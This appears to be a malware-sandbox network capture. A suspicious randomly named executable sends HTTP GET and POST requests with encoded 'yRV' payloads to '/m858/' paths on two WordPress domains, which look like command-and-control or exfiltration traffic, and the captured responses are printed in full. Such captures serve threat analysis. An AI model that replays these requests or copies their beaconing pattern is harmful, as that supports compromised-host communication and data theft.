                                                                                                                      Dec 7, 2023 15:53:11.311863899 CET1286INData Raw: 36 65 63 0d 0a f0 6a 01 40 7e 6d ea 9f 83 d4 c3 fd 89 8a 6e 87 67 9b 9d d1 fd c7 58 c8 01 03 6e cd 10 18 c8 ef bd 7b 6b 42 18 1e c2 9c b1 2b dc cc 24 e2 6f fe 75 c5 2e a5 14 55 27 c9 e4 e7 6f 69 a7 68 45 f6 a2 4a 77 27 24 4a 35 0f 46 62 64 f6 3b
                                                                                                                      Data Ascii: 6ecj@~mngXn{kB+$ou.U'oihEJw'$J5Fbd;P Ix,\!Bk"3;i]Vo3`-'~[xa6T(X:u767O&E x/LMJtFYj$qjPiZ]dS[RV
                                                                                                                      Dec 7, 2023 15:53:11.311908960 CET493INData Raw: cc f6 00 ee 47 30 74 18 73 d8 b3 38 29 bd f3 fc be 59 fc 85 6d af 4a 52 47 d0 fd 28 0f 43 bc a2 42 f8 96 07 c1 3e 08 96 0f 5d 09 41 30 5f 40 b4 07 50 c4 3d c5 44 2f 09 a0 88 0f 56 14 bb 81 fa 38 97 07 da 41 b8 59 8c a6 b5 93 94 78 d9 ff 40 b3 5d
                                                                                                                      Data Ascii: G0ts8)YmJRG(CB>]A0_@P=D/V8AYx@]z{Is]<Q],.KVreh (A/8FzdpIdZ|wr/@~a~|pH#_<OD9[q(:#1;VXhK
                                                                                                                      Dec 7, 2023 15:53:11.314075947 CET1286INData Raw: 38 62 32 0d 0a 98 03 01 40 2e 55 ad 5a 6a 2a 70 cf 81 f4 31 20 30 28 98 17 52 7a 79 38 20 b1 92 20 33 0d 01 05 bf 4e 65 f1 4d fb 57 fb bd 0a 15 97 89 17 75 76 e1 c4 83 5f 42 d8 db 83 00 b0 2b b2 65 54 55 64 74 65 c0 9a 9b aa da 2a d7 a9 12 95 3e
                                                                                                                      Data Ascii: 8b2@.UZj*p1 0(Rzy8 3NeMWuv_B+eTUdte*>>"J<]Ejinun{w>csnmt7k6puri#{aSz6qX0%fI)Mg1P\Y<b2Lpx#
                                                                                                                      Dec 7, 2023 15:53:11.693408012 CET1286INData Raw: 09 92 93 6a 3e 1e 8d 4e 9e eb cd c7 08 3e ec 8a b1 b6 71 44 81 15 17 68 d5 c4 aa 68 40 68 42 87 06 c3 b6 b5 ba 41 14 b5 1f 0d 99 08 a7 f0 e7 5c 4e 53 06 3b 65 11 7a ec be 0f fa ae be 5b 6a d8 4f 04 77 6a 05 4b 42 04 56 d2 49 c4 eb 8d 5a e5 97 53
                                                                                                                      Data Ascii: j>N>qDhh@hBA\NS;ez[jOwjKBVIZSWfx|0@KNdW0;ufxczYDC+4f@Ecp:y@1yK<SnE"seO!cZRT:eb Z`Qze1cy4W!&Dx,4


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      4192.168.2.1149714103.210.56.141802016C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 15:53:13.075639963 CET448OUTGET /m858/?yRV=ZTmxX8apPfF8tkROuhCldKUdm000Pni379NFYx1SML9Ouafr/VkVuzz6gSxjw9bsMzi4V9YgtsvXh5Nq9d6FDvJTGXu41Kek/g==&GJ=C4IdWhJXSFOXR8D HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Host: www.fortunetravelsltd.com
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Dec 7, 2023 15:53:14.152849913 CET502INHTTP/1.1 301 Moved Permanently
                                                                                                                      Connection: close
                                                                                                                      content-type: text/html; charset=UTF-8
                                                                                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                      x-redirect-by: WordPress
                                                                                                                      location: http://fortunetravelsltd.com/m858/?yRV=ZTmxX8apPfF8tkROuhCldKUdm000Pni379NFYx1SML9Ouafr/VkVuzz6gSxjw9bsMzi4V9YgtsvXh5Nq9d6FDvJTGXu41Kek/g==&GJ=C4IdWhJXSFOXR8D
                                                                                                                      content-length: 0
                                                                                                                      date: Thu, 07 Dec 2023 14:53:13 GMT
                                                                                                                      server: LiteSpeed
                                                                                                                      referrer-policy: no-referrer-when-downgrade


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      5192.168.2.1149716173.231.241.132802016C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 15:53:19.597227097 CET713OUTPOST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.porousworld.com
                                                                                                                      Origin: http://www.porousworld.com
                                                                                                                      Referer: http://www.porousworld.com/m858/
                                                                                                                      Content-Length: 184
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Raw: 79 52 56 3d 38 51 72 38 46 50 2f 39 53 56 6d 44 41 72 67 45 33 54 46 37 38 6f 56 52 4f 75 5a 2b 53 50 4b 36 33 7a 2f 4b 30 45 31 78 62 4d 47 78 49 46 2b 6d 74 7a 32 49 2b 39 46 43 30 4e 6e 56 56 39 55 34 73 30 77 2f 76 4e 48 43 74 75 33 6b 72 69 72 42 6d 6b 54 75 4c 31 7a 6b 55 66 67 56 4e 4c 72 4e 5a 44 31 2b 6b 4c 62 76 74 39 44 31 48 79 69 47 4b 63 78 48 32 50 4d 79 51 30 77 76 36 46 4d 66 6a 65 62 53 65 68 41 66 59 75 2f 4a 34 47 7a 6d 43 32 4e 31 46 4a 72 45 59 62 48 47 55 69 54 6a 36 41 45 6c 41 51 33 4b 78 6c 4e 5a 55 58 6d 59 48 67 3d 3d
                                                                                                                      Data Ascii: yRV=8Qr8FP/9SVmDArgE3TF78oVROuZ+SPK63z/K0E1xbMGxIF+mtz2I+9FC0NnVV9U4s0w/vNHCtu3krirBmkTuL1zkUfgVNLrNZD1+kLbvt9D1HyiGKcxH2PMyQ0wv6FMfjebSehAfYu/J4GzmC2N1FJrEYbHGUiTj6AElAQ3KxlNZUXmYHg==
                                                                                                                      Dec 7, 2023 15:53:21.424727917 CET418INHTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 14:53:19 GMT
                                                                                                                      Server: Apache
                                                                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                      Link: <https://porousworld.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 0d 0a
                                                                                                                      Data Ascii: 3b<!DOCTYPE html><html lang="en-US"><head><meta charset="
                                                                                                                      Dec 7, 2023 15:53:21.425553083 CET88INData Raw: 35 32 0d 0a 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22
                                                                                                                      Data Ascii: 52UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                                                                                                      Dec 7, 2023 15:53:21.434585094 CET63INData Raw: 33 39 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 0d 0a
                                                                                                                      Data Ascii: 39<meta name='robots' content='max-image-preview:large' />
                                                                                                                      Dec 7, 2023 15:53:21.435039997 CET57INData Raw: 33 33 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 50 6f 72 6f 75 73 20 57 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 0d 0a
                                                                                                                      Data Ascii: 33<title>Page not found &#8211; Porous World</title>
                                                                                                                      Dec 7, 2023 15:53:21.435226917 CET59INData Raw: 33 35 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 70 6f 72 6f 75 73 77 6f 72 6c 64 2e 63 6f 6d 27 20 2f 3e 0a 0d 0a
                                                                                                                      Data Ascii: 35<link rel='dns-prefetch' href='//porousworld.com' />
                                                                                                                      Dec 7, 2023 15:53:21.435671091 CET129INData Raw: 37 62 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 50 6f 72 6f 75 73 20 57 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46
                                                                                                                      Data Ascii: 7b<link rel="alternate" type="application/rss+xml" title="Porous World &raquo; Feed" href="https://porousworld.com/feed/" />
                                                                                                                      Dec 7, 2023 15:53:21.435691118 CET147INData Raw: 38 64 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 50 6f 72 6f 75 73 20 57 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43
                                                                                                                      Data Ascii: 8d<link rel="alternate" type="application/rss+xml" title="Porous World &raquo; Comments Feed" href="https://porousworld.com/comments/feed/" />
                                                                                                                      Dec 7, 2023 15:53:21.435900927 CET1286INData Raw: 63 65 38 0d 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72
                                                                                                                      Data Ascii: ce8<script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/porous
                                                                                                                      Dec 7, 2023 15:53:21.435949087 CET1286INData Raw: 2c 22 5c 75 64 38 33 65 5c 75 64 65 66 31 5c 75 64 38 33 63 5c 75 64 66 66 62 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 65 66 32 5c 75 64 38 33 63 5c 75 64 66 66 66 22 2c 22 5c 75 64 38 33 65 5c 75 64 65 66 31 5c 75 64 38 33 63 5c 75 64 66 66
                                                                                                                      Data Ascii: ,"\ud83e\udef1\ud83c\udffb\u200d\ud83e\udef2\ud83c\udfff","\ud83e\udef1\ud83c\udffb\u200b\ud83e\udef2\ud83c\udfff")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(3
                                                                                                                      Dec 7, 2023 15:53:21.435962915 CET739INData Raw: 72 65 61 74 65 4f 62 6a 65 63 74 55 52 4c 28 72 29 2c 7b 6e 61 6d 65 3a 22 77 70 54 65 73 74 45 6d 6f 6a 69 53 75 70 70 6f 72 74 73 22 7d 29 3b 72 65 74 75 72 6e 20 76 6f 69 64 28 61 2e 6f 6e 6d 65 73 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65
                                                                                                                      Data Ascii: reateObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      6192.168.2.1149717173.231.241.132802016C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 15:53:22.274213076 CET733OUTPOST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.porousworld.com
                                                                                                                      Origin: http://www.porousworld.com
                                                                                                                      Referer: http://www.porousworld.com/m858/
                                                                                                                      Content-Length: 204
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Raw: 79 52 56 3d 38 51 72 38 46 50 2f 39 53 56 6d 44 42 4c 51 45 37 51 74 37 6f 34 56 4f 53 2b 5a 2b 62 76 4b 2b 33 7a 6a 4b 30 46 77 30 62 66 69 78 4a 67 61 6d 38 47 43 49 39 39 46 43 73 64 6e 4d 4c 4e 55 46 73 30 38 5a 76 4e 37 43 74 75 6a 6b 72 6e 58 42 6d 54 76 74 4b 6c 7a 36 63 2f 67 58 44 72 72 4e 5a 44 31 2b 6b 4c 4f 36 74 39 37 31 45 44 53 47 4c 39 78 47 70 2f 4d 78 5a 55 77 76 2b 46 4d 6c 6a 65 62 67 65 6a 6b 35 59 74 48 4a 34 43 33 6d 43 44 74 32 4c 4a 72 47 63 62 47 73 56 33 71 36 75 78 6c 73 41 53 4c 33 6e 42 63 51 56 43 4b 4c 41 62 77 64 57 4a 6a 6b 7a 69 45 31 4f 34 41 67 42 4b 63 44 7a 63 55 3d
                                                                                                                      Data Ascii: yRV=8Qr8FP/9SVmDBLQE7Qt7o4VOS+Z+bvK+3zjK0Fw0bfixJgam8GCI99FCsdnMLNUFs08ZvN7CtujkrnXBmTvtKlz6c/gXDrrNZD1+kLO6t971EDSGL9xGp/MxZUwv+FMljebgejk5YtHJ4C3mCDt2LJrGcbGsV3q6uxlsASL3nBcQVCKLAbwdWJjkziE1O4AgBKcDzcU=
                                                                                                                      Dec 7, 2023 15:53:23.540599108 CET381INHTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 14:53:22 GMT
                                                                                                                      Server: Apache
                                                                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                      Link: <https://porousworld.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 0d 0a
                                                                                                                      Data Ascii: 16<!DOCTYPE html><html
                                                                                                                      Dec 7, 2023 15:53:23.540617943 CET43INData Raw: 32 35 0d 0a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 0d 0a
                                                                                                                      Data Ascii: 25lang="en-US"><head><meta charset="
                                                                                                                      Dec 7, 2023 15:53:23.540884972 CET88INData Raw: 35 32 0d 0a 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22
                                                                                                                      Data Ascii: 52UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                                                                                                      Dec 7, 2023 15:53:23.566216946 CET63INData Raw: 33 39 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 0d 0a
                                                                                                                      Data Ascii: 39<meta name='robots' content='max-image-preview:large' />
                                                                                                                      Dec 7, 2023 15:53:23.567135096 CET57INData Raw: 33 33 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 50 6f 72 6f 75 73 20 57 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 0d 0a
                                                                                                                      Data Ascii: 33<title>Page not found &#8211; Porous World</title>
                                                                                                                      Dec 7, 2023 15:53:23.567291021 CET59INData Raw: 33 35 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 70 6f 72 6f 75 73 77 6f 72 6c 64 2e 63 6f 6d 27 20 2f 3e 0a 0d 0a
                                                                                                                      Data Ascii: 35<link rel='dns-prefetch' href='//porousworld.com' />
                                                                                                                      Dec 7, 2023 15:53:23.567547083 CET129INData Raw: 37 62 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 50 6f 72 6f 75 73 20 57 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46
                                                                                                                      Data Ascii: 7b<link rel="alternate" type="application/rss+xml" title="Porous World &raquo; Feed" href="https://porousworld.com/feed/" />
                                                                                                                      Dec 7, 2023 15:53:23.567739964 CET147INData Raw: 38 64 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 50 6f 72 6f 75 73 20 57 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43
                                                                                                                      Data Ascii: 8d<link rel="alternate" type="application/rss+xml" title="Porous World &raquo; Comments Feed" href="https://porousworld.com/comments/feed/" />
                                                                                                                      Dec 7, 2023 15:53:23.567970037 CET1286INData Raw: 63 65 38 0d 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72
                                                                                                                      Data Ascii: ce8<script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/porous
                                                                                                                      Dec 7, 2023 15:53:23.568032980 CET1286INData Raw: 2c 22 5c 75 64 38 33 65 5c 75 64 65 66 31 5c 75 64 38 33 63 5c 75 64 66 66 62 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 65 66 32 5c 75 64 38 33 63 5c 75 64 66 66 66 22 2c 22 5c 75 64 38 33 65 5c 75 64 65 66 31 5c 75 64 38 33 63 5c 75 64 66 66
                                                                                                                      Data Ascii: ,"\ud83e\udef1\ud83c\udffb\u200d\ud83e\udef2\ud83c\udfff","\ud83e\udef1\ud83c\udffb\u200b\ud83e\udef2\ud83c\udfff")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(3
                                                                                                                      Dec 7, 2023 15:53:23.692284107 CET1286INData Raw: 72 65 61 74 65 4f 62 6a 65 63 74 55 52 4c 28 72 29 2c 7b 6e 61 6d 65 3a 22 77 70 54 65 73 74 45 6d 6f 6a 69 53 75 70 70 6f 72 74 73 22 7d 29 3b 72 65 74 75 72 6e 20 76 6f 69 64 28 61 2e 6f 6e 6d 65 73 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65
                                                                                                                      Data Ascii: reateObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      7192.168.2.1149718173.231.241.132802016C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 15:53:24.945382118 CET1746OUTPOST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.porousworld.com
                                                                                                                      Origin: http://www.porousworld.com
                                                                                                                      Referer: http://www.porousworld.com/m858/
                                                                                                                      Content-Length: 1216
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Raw: 79 52 56 3d 38 51 72 38 46 50 2f 39 53 56 6d 44 42 4c 51 45 37 51 74 37 6f 34 56 4f 53 2b 5a 2b 62 76 4b 2b 33 7a 6a 4b 30 46 77 30 62 66 71 78 49 54 69 6d 75 52 75 49 38 39 46 43 79 4e 6e 52 4c 4e 55 55 73 30 6b 56 76 4e 33 34 74 73 62 6b 71 46 50 42 78 33 37 74 41 6c 7a 36 44 50 67 57 4e 4c 72 39 5a 44 46 36 6b 4c 65 36 74 39 37 31 45 42 4b 47 4f 63 78 47 76 2f 4d 79 51 30 77 5a 36 46 4e 4b 6a 66 7a 77 65 6a 77 50 59 64 6e 4a 32 43 6e 6d 52 48 4e 32 44 4a 72 41 62 62 47 30 56 33 75 66 75 33 42 4b 41 53 2f 5a 6e 43 4d 51 57 32 2b 64 45 37 6b 38 44 37 66 32 6a 33 51 54 4e 70 70 56 52 5a 49 50 72 37 2b 4d 4e 48 33 6a 4f 47 58 75 5a 36 75 68 75 63 69 37 71 73 56 5a 69 79 51 49 57 4f 32 72 50 43 73 46 69 30 50 71 42 51 65 34 52 74 69 51 36 6f 75 46 2f 53 39 2b 45 73 63 67 6b 37 51 65 5a 78 6f 4c 4b 4e 33 36 38 47 33 6d 77 42 4e 4e 30 58 55 32 6d 39 4e 65 53 68 69 76 31 37 6d 79 76 74 54 44 74 65 44 53 61 53 6f 61 6d 42 46 2b 53 44 6d 6e 56 70 63 6b 42 52 35 68 6e 4a 4e 45 32 51 4a 59 33 6c 76 2b 2f 78 6b 30 47 37 39 63 58 2b 57 58 4c 64 62 57 69 64 54 65 76 68 78 7a 4b 6f 58 4f 67 73 56 30 53 62 74 58 30 66 78 78 46 68 58 32 61 7a 6c 50 58 47 70 34 37 36 35 4e 43 34 58 38 74 62 31 41 61 38 44 38 33 66 76 4d 49 30 4d 77 63 42 63 74 67 4b 79 46 34 32 67 56 6c 59 72 70 57 38 6e 6f 32 56 38 4f 42 35 36 56 32 48 4d 4c 43 76 7a 66 36 5a 31 36 36 75 65 34 2b 4c 2b 71 4c 33 69 63 7a 36 38 63 36 33 54 65 75 7a 69 55 33 4a 75 50 7a 41 33 32 33 75 78 53 66 76 67 77 6e 38 38 72 7a 39 54 43 41 64 42 79 39 6d 36 41 54 74 4a 57 6c 36 55 56 4b 39 79 2f 32 4c 44 65 43 4e 41 74 51 7a 6c 51 4f 47 6d 4f 30 66 33 4d 77 46 54 37 33 61 5a 43 75 4a 76 7a 33 30 35 54 57 67 43 4d 55 57 42 34 52 58 58 35 35 48 6c 2f 46 6f 76 75 65 44 54 2b 33 61 48 65 46 68 67 41 41 75 47 79 45 46 4c 4d 44 77 58 31 48 47 5a 58 57 54 34 6a 6d 34 56 70 4c 51 61 58 2f 6a 4b 7a 51 72 61 4b 62 56 45 50 48 4e 32 55 39 69 63 61 78 2f 78 48 61 35 68 5a 59 45 6d 55 62 67 69 65 32 42 68 6a 39 71 79 42 7a 45 34 54 54 4c 57 74 46 30 77 6c 42 7a 33 4e 77 69 75 31 73 53 47 4a 63 70 4f 48 38 6d 7a 66 4a 47 34 5a 35 50 59 6e 4d 2f 76 7a 64 4d 6e 48 6b 4e 38 6a 56 39 6d 46 4f 32 76 75 62 48 6b 44 39 45 67 32 68 79 4c 39 43 42 5a 49 62 32 34 74 38 76 49 43 53 73 76 52 72 36 46 30 62 46 32 68 43 33 4a 55 42 46 63 32 34 47 69 78 49 59 48 4a 61 44 35 59 61 4c 37 31 31 73 6e 41 4f 70 77 47 35 39 7a 4e 74 65 70 36 44 36 53 66 4d 4f 72 66 6b 6f 4b 64 70 59 56 53 51 38 79 6c 47 6e 39 71 79 4e 32 6a 4f 4b 2f 5a 30 39 75 42 2b 38 78 63 67 46 44 4d 2f 6c 42 70 43 30 42 31 63 31 44 77 36 5a 47 65 53 4a 36 70 4e 74 77 69 59 6c 54 76 2b 75 58 51 4a 56 39 54 55 2f 6b 2b 47 6d 51 65 58 54 6b 41 35 55 35 6e 77 65 4d 6b 32 37 36 67 70 4e 35 50 30 78 51 38 66 57 77 61 47 2f 59 4e 5a 54 46 4f 62 69 2b 31 4c 63 42 71 45 59 2f 55 78 33 48 69 55 52 33 56 65 58 65 74 35 6c 4d 6e 75 37 68 66 59 4a 44 63 48 57 2b 6d 58 73 64 4c 37 51 59 4e 71 49 6c 58 52 2f 47 32 63 61 48 71 4e 45 78 30 47 36 65 43 37 77 7a 7a 73 4a 6e 74 46 78 32 70 74 48 42 57 2b 59 64 36 73 68 7a 58 75 74 4c 52 5a 4d 37 48 48 2b 41 38 78 58 75 33 38 58 4e 2f 37 66 46 36 39 6d 45 45 44 38 78 2f 57 44 5a 54 49 41 35 6c 63 4b 73 2f 6f 35 70 48 72 6b 4f 6a 55 58 42 63 43 41 4a 67 6d 6b 5a 4f 6f 2f 4b 52 59 5a 68 32 41 65 37 75 38 62 44 51 6c 4f 49 34 70 4e 77 64 76 2f 45 58 39 64 58 48 55 71 71 34 51 46 44 33 34 45 33 72 51 44 42 6c 75 76 37 32 46 68 50 38 53 68 6a 6c 2b 57 4e 39 30 49 2b 30 70 61 74 67 41 6a 69 6b 41 4e 52 4c 4b 6b 57 6c 30 51 46 50 42 6b 51 6a 71 42 51 5a 72 50 35 47 2b 64 4e 43 72 68 4b 37 33 45 73 77 30 64 6d 48 48 62 69 6b 6a 6a 30 49 45 43 74 48 62 4c 54 33 37 42 2f 2f 38 62 66 4e
